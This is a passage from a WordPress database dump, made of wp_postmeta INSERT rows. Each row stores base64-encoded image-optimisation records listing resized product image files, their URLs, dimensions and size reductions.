xpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VQSUtVUkUtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTAyOTMsImlkIjoxOTUyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBJS1VSRS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MDI5NSwiaWQiOjE5NTJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FUElLVVJFLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUwMjk4LCJpZCI6MTk1Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VQSUtVUkUtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTAzMDEsImlkIjoxOTUyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJS1VSRS0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FUElLVVJFLTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUwMzAzLCJpZCI6MTk1Mn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSUtVUkUtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElLVVJFLTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBJS1VSRS00NTB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MDMwNywiaWQiOjE5NTJ9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (28928, 1951, 'wpfc_optimisation_reduction', '1621392'); 
INSERT INTO `wp_postmeta` VALUES (28929, 1951, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSGVsb3h5LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSGVsb3h5LmpwZyIsIndpZHRoIjoyMzM2LCJoZWlnaHQiOjMzMjMsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9IZWxveHkuanBnIiwicmVkdWN0aW9uIjoxNjIxMzgyLCJ0aW1lIjoxNDgzNTUwMzE3LCJpZCI6IjE5NTEifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hlbG94eS0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hlbG94eS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0hlbG94eS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MDMyMCwiaWQiOjE5NTF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSGVsb3h5LTU2Mng4MDAuanBnIiwid2lkdGgiOjU2MiwiaGVpZ2h0Ijo4MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSGVsb3h5LTU2Mng4MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvSGVsb3h5LTU2Mng4MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUwMzIzLCJpZCI6MTk1MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IZWxveHktNzY4eDEwOTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0IjoxMDkyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hlbG94eS03Njh4MTA5Mi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9IZWxveHktNzY4eDEwOTIuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUwMzI2LCJpZCI6MTk1MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IZWxveHktMTEyNXgxNjAwLmpwZyIsIndpZHRoIjoxMTI1LCJoZWlnaHQiOjE2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSGVsb3h5LTExMjV4MTYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9IZWxveHktMTEyNXgxNjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MDMyOSwiaWQiOjE5NTF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSGVsb3h5LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSGVsb3h5LTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvSGVsb3h5LTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUwMzMyLCJpZCI6MTk1MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IZWxveHktMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IZWxveHktMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9IZWxveHktMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTAzMzQsImlkIjoxOTUxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hlbG94eS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hlbG94eS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0hlbG94eS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MDMzNiwiaWQiOjE5NTF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSGVsb3h5LTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSGVsb3h5LTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvSGVsb3h5LTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUwMzM5LCJpZCI6MTk1MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hlbG94eS0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hlbG94eS0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0hlbG94eS0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MDM0MSwiaWQiOjE5NTF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IZWxveHktMzE2eDQ1MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IZWxveHktMzE2eDQ1MC5qcGciLCJ3aWR0aCI6IjMxNiIsImhlaWdodCI6IjQ1MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9IZWxveHktMzE2eDQ1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTAzNDQsImlkIjoxOTUxfV0='); 
INSERT INTO `wp_postmeta` VALUES (28930, 1950, 'wpfc_optimisation_reduction', '15817'); 
INSERT INTO `wp_postmeta` VALUES (28931, 1950, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRXBvbi1yZXNpbi5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0Vwb24tcmVzaW4uanBnIiwid2lkdGgiOjU2MTYsImhlaWdodCI6Mzc0NCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU1MDM0OCwiaWQiOiIxOTUwIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FcG9uLXJlc2luLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRXBvbi1yZXNpbi0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0Vwb24tcmVzaW4tMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjY0OCwidGltZSI6MTQ4MzU1MDM1MiwiaWQiOjE5NTB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRXBvbi1yZXNpbi04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0Vwb24tcmVzaW4tODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FcG9uLXJlc2luLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxODAyLCJ0aW1lIjoxNDgzNTUwMzU1LCJpZCI6MTk1MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FcG9uLXJlc2luLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRXBvbi1yZXNpbi03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0Vwb24tcmVzaW4tNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjE2MzksInRpbWUiOjE0ODM1NTAzNTksImlkIjoxOTUwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0Vwb24tcmVzaW4tMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRXBvbi1yZXNpbi0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRXBvbi1yZXNpbi0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjo4MDA4LCJ0aW1lIjoxNDgzNTUwMzYzLCJpZCI6MTk1MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FcG9uLXJlc2luLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRXBvbi1yZXNpbi0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0Vwb24tcmVzaW4tMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjUzNywidGltZSI6MTQ4MzU1MDM2NiwiaWQiOjE5NTB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRXBvbi1yZXNpbi0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0Vwb24tcmVzaW4tMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FcG9uLXJlc2luLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0MjEsInRpbWUiOjE0ODM1NTAzNjksImlkIjoxOTUwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0Vwb24tcmVzaW4tMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FcG9uLXJlc2luLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRXBvbi1yZXNpbi0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NDY5LCJ0aW1lIjoxNDgzNTUwMzczLCJpZCI6MTk1MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FcG9uLXJlc2luLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRXBvbi1yZXNpbi01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0Vwb24tcmVzaW4tNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjExODgsInRpbWUiOjE0ODM1NTAzNzYsImlkIjoxOTUwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRXBvbi1yZXNpbi0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0Vwb24tcmVzaW4tMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FcG9uLXJlc2luLTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjo1MTQsInRpbWUiOjE0ODM1NTAzNzksImlkIjoxOTUwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRXBvbi1yZXNpbi00NTB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0Vwb24tcmVzaW4tNDUweDMwMC5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FcG9uLXJlc2luLTQ1MHgzMDAuanBnIiwicmVkdWN0aW9uIjo1OTEsInRpbWUiOjE0ODM1NTAzODMsImlkIjoxOTUwfV0='); 
INSERT INTO `wp_postmeta` VALUES (28932, 1949, 'wpfc_optimisation_reduction', '12171'); 
